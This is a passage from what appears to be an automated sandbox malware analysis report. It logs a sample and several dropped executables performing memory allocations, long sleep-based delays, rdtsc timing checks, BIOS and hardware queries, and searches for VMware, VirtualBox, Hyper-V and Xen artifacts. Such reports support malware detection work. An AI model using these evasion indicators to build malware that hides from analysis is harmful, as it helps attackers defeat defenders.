                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeMemory allocated: DB00000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeMemory allocated: ED20000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeMemory allocated: FD20000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeMemory allocated: 10D20000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeMemory allocated: 3180000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeMemory allocated: 3320000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeMemory allocated: 5320000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeMemory allocated: 8F0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeMemory allocated: 2830000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeMemory allocated: BC0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeMemory allocated: 4DD0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeMemory allocated: 5DD0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeMemory allocated: 5F00000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeMemory allocated: 6F00000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeMemory allocated: AA70000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeMemory allocated: BA70000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeMemory allocated: BF00000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeMemory allocated: 5F00000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeMemory allocated: AA70000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeMemory allocated: BF00000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeMemory allocated: 27E0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeMemory allocated: 2AB0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeMemory allocated: 4AB0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeMemory allocated: FE0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeMemory allocated: 2BC0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeMemory allocated: 2A00000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04F30E14 rdtsc 0_2_04F30E14
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 957Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 363Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1307Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1232Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeWindow / User API: threadDelayed 2648
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeWindow / User API: threadDelayed 7149
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7236
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2468
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8012
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1635
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 832
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017355001\96ae609d19.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7892Thread sleep time: -48024s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7852Thread sleep count: 957 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7852Thread sleep time: -1914957s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7836Thread sleep count: 363 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7836Thread sleep time: -10890000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7872Thread sleep count: 1307 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7872Thread sleep time: -2615307s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7856Thread sleep count: 1232 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7856Thread sleep time: -2465232s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exe TID: 8068Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exe TID: 4008Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe TID: 7400Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe TID: 1220Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -37815825351104557s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -100000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -99890s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -99781s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -99672s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -99553s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -99422s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -99312s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -99203s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -99094s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -98980s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -98860s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -98735s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -98610s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -98485s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -98360s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -98235s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -98110s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -97985s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -97860s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -97735s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -97610s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -97485s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -97360s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -97235s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -97110s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -96985s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -96859s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -96750s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -96615s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -96484s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -96335s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -96216s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -96075s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -95969s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -95859s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -95750s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -95641s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -95531s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -95422s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -95313s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -95203s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -95094s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -94984s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -94875s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -94766s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -94656s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -94547s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe TID: 7396Thread sleep time: -94437s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5308Thread sleep count: 7236 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3168Thread sleep count: 2468 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4544Thread sleep time: -4611686018427385s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep count: 8012 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7632Thread sleep count: 1635 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7572Thread sleep time: -3689348814741908s >= -30000s
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exe TID: 5368Thread sleep time: -90000s >= -30000s
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exe TID: 6696Thread sleep time: -30000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exe TID: 6360Thread sleep time: -30000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                              Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                              Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                              Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 100000
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 99890
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 99781
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 99672
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 99553
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 99422
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 99312
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 99203
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 99094
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 98980
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 98860
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 98735
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 98610
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 98485
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 98360
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 98235
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 98110
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 97985
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 97860
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 97735
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 97610
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 97485
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 97360
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 97235
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 97110
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 96985
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 96859
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 96750
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 96615
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 96484
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 96335
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 96216
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 96075
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 95969
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 95859
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 95750
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 95641
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 95531
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 95422
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 95313
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 95203
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 95094
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 94984
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 94875
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 94766
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 94656
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 94547
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeThread delayed: delay time: 94437
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\
                              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\
                              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\
                              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
                              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
                              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extracted
                              Source: skotes.exe, skotes.exe, 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmp, ac68c6b737.exe, 00000015.00000002.2764578126.000000000031C000.00000040.00000001.01000000.00000014.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                              Source: kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002D27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware\V
                              Source: zudFSfy.exe, 00000009.00000002.2486574208.0000000003321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2486574208.0000000003595000.00000004.00000800.00020000.00000000.sdmp, kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002D27000.00000004.00000800.00020000.00000000.sdmp, kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002ABA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmGuestLib.dll
                              Source: skotes.exe, 00000006.00000002.2970891358.0000000000788000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002D27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen@\^q
                              Source: e56fffc2ce.exe, 0000000E.00000002.2856597884.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                              Source: kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002D27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWareLR^q
                              Source: kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002ABA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                              Source: kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002D27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: EP 51PUpBDxDgY aVpfgPZd@\^q0Microsoft|VMWare|Virtual
                              Source: zudFSfy.exe, 00000009.00000002.2486574208.0000000003595000.00000004.00000800.00020000.00000000.sdmp, kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002D27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q"C:\Windows\system32\vmGuestLib.dll
                              Source: kz8ZdyP.exe, 0000000D.00000002.2585412767.00000000056D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Windows\system32\vmGuestLib.dllM/
                              Source: kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002D27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q 1:en-CH:VMware|VIRTUAL|A M I|Xen
                              Source: e56fffc2ce.exe, 0000000E.00000002.2856597884.0000000000DB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002D27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual@\^q
                              Source: skotes.exe, 00000006.00000002.2970891358.0000000000748000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                              Source: skotes.exe, 00000006.00000002.2970891358.0000000000788000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWZ
                              Source: e56fffc2ce.exe, 0000000E.00000002.2856597884.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002D27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 8F5F8 7PP8HEYO6M@\^q0VMware|VIRTUAL|A M I|Xen
                              Source: kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002D27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                              Source: kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002D27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwareLR^q
                              Source: zudFSfy.exe, 00000009.00000002.2486574208.0000000003595000.00000004.00000800.00020000.00000000.sdmp, kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002D27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmGuestLib.dll@\^q
                              Source: file.exe, 00000000.00000003.1730996972.0000000000F8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                              Source: kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002ABA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
